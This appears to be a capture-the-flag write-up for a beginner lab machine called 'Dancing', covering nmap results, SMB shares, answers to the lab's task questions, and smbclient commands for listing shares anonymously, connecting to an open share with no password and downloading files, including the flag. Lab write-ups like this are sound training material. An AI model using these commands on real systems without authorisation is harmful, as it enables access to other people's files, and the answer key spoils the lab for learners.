Dancing
Target Information:
- 10.129.174.16
- PORTS:
  - 135/tcp open msrpc
  - 139/tcp open netbios-ssn
  - 445/tcp open microsoft-ds
- NETWORK SHARES:
  - ADMIN$ Disk Remote Admin
  - C$ Disk Default share
  - IPC$ IPC Remote IPC
  - WorkShares Disk
============================================
Task #1: What does the 3-letter acronym SMB stand for?
- A: Server Message Block
Task #2: What port does SMB use to operate at?
- A: 445
Task #3: What is the service name for port 445 that came up in our Nmap scan?
- A: microsoft-ds
- nmap 10.129.174.16
Task #4: What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?
- A: -L
Task #5: How many shares are there on Dancing?
- A: 4
- smbclient -N -L 10.129.174.16
Task #6: What is the name of the share we are able to access in the end with a blank password?
- A: WorkShares
- smbclient -N //10.129.174.16/WorkShares
Task #7: What is the command we can use within the SMB shell to download the files we find?
- A: get
- help
Root Flag:
- get Amy.J/worknotes.txt worknotes.txt
- get James.P\flag.txt